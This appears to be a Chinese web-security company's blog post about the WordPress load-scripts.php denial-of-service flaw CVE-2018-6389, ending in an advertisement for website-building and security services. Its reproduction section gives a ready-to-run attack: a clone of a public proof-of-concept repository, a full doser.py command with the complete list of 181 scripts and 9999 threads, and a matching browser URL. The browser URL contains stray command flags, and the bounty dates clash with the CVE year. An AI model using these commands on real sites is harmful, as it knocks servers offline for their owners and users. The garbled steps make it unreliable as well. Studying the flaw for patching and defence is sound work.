漏洞公告团结互助，让我们共同进步！

当前位置：主页 > 技术资讯 > 网络安全 > 漏洞公告 >

我们的优势： 10年相关行业经验，专业设计师量身定制设计师一对一服务模式，上百家客户案例！企业保证，正规流程，正规合作 7*24小时在线服务，售后无忧

影响3.x至4.x所有版本的WordPress程序的DoS通杀漏洞CVE-2018-6389

文章来源：重庆网络安全围观次数：

分享到:

摘要：本文共享的文章涉及WordPress DoS漏洞CVE-2018-6389，该漏洞影响从3 x到4 x的所有版本的WordPress程序。作者针对此漏洞测试并验证了目标网站，并获得了700美元的奖金，网站建设安全性越发重要。

CVE-2018-6389简介

漏洞的重点是load-scripts.php，该文件是为WordPress管理员设计的，允许将多个JavaScript文件加载到一个请求中，但是研究人员注意到，可以在登录之前调用此函数，以允许任何人调用它，任何人都可以允许这种调用。通过构造特殊的有效负载，服务器可以执行181个I / O操作。在并发请求的情况下，可以实现Dos的效果。

漏洞测试

在测试中，我看到一个网站是WordPress架构，它具有以下路径：

https://example.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core&ver=4.9.1

load-scripts.php文件将从load []接收一个参数值为'jquery-ui-core'的参数。加载请求后，我收到了“ jQuery UI Core”响应模块的JS。

至此，我想到了CVE-2018-6389，这是WordPress中的DoS漏洞。尽管它只是DoS，但它也是一个流行的漏洞。此漏洞的原因是WordPress允许用户通过load-scripts.php文件一次加载多个JS文件和CSS文件。之后，load-scripts.php将自动加载jquery-ui-core和编辑器文件并返回文件内容。但是，在加载JS文件的过程中，文件的数量和大小没有限制。攻击者可以使用此功能来耗尽服务器资源，以发起拒绝服务攻击。本文将使用VulnSpy的在线实验环境来重现和测试该漏洞。

上面的链接似乎表明它可能是提供给用户的JS模块。另外，load []参数是一个数组，这意味着可以为其提供多个值，以便可以在响应中获得多个JS模块。

因为WordPress使用wp_scripts列表存储所有181个脚本文件的路径，所以目的是允许管理员或开发人员在load []参数中包含特定脚本的路径，并根据用户提供的值提高性能。 wp_scripts列表被硬编码在script-loader.php文件中。因此，我想知道是否向服务器发出请求，并要求它响应存储的每个JS模块，以便单个请求可以使服务器执行181个输入/输出（I / O）操作！然后尝试CVE-2018-6389。

我尝试过，它确实存在！服务器在2.2秒内响应了大约4MB的数据。可以看出它对服务器性能的影响有多大。

漏洞复现

1.在Linux终端中输入命令clonehttps：//github.com/WazeHell/CVE-2018-6389.git

2.复制测试脚本，并以目标网站https://example.com/为例，进行以下测试：

python doser.py -g 'https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999

在发送了2,000多个数据包之后，我发现服务器已经做出了显着响应。

3.现在，我们在浏览器中访问以下链接：

https://example.com/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999

可以看出，服务器基本上处于瘫痪状态，最终将返回超时状态提醒，因此测试有效且成功。

漏洞报告和处理

2019.8.23漏洞初步报告

2019.8.24供应商回复

2019.8.27制造商奖励$ 700

可见

大型公司已开始觉醒，可以利于的漏洞软件离我们并不遥远。与我们息息相关的就是企业网站，门户网站，特别是商城网站建设安全性尤为重要。我们不能低估网站安全的重要性，您可以想象一下一个网站漏洞可以给你带来的后果。饱尝危机的公司已开始增加其网站的安全保护，开始全面监视程序漏洞的安全性，并紧急增加应急计划和增加年度安全维护预算。

一些公司对网站的安全性没有给予足够的重视。为了省钱，他们购买了模板网站和虚拟主机。这样的鸡肋网站不仅没有抗攻击能力，甚至可能不攻自破，这并没有达到节省开支的目的。选择一家专业的网站建设公司来提供全套的专业技术和安全维护，您的网站就可以高枕无忧了。

本文由重庆网络安全整理发布,转载请保留出处，内容部分来自于互联网，如有侵权请联系我们删除。

相关热词搜索：WordPress DoS漏洞 CVE-2018-6389 网站建设安全网络安全

上一篇：安全漏洞爆出：Twitter面向所有Android端用户通过移动APP和电子邮件的方式通知尽快更改密码
下一篇：国内儿童智能手表爆高危安全防护漏洞映射网站建设安全的重要性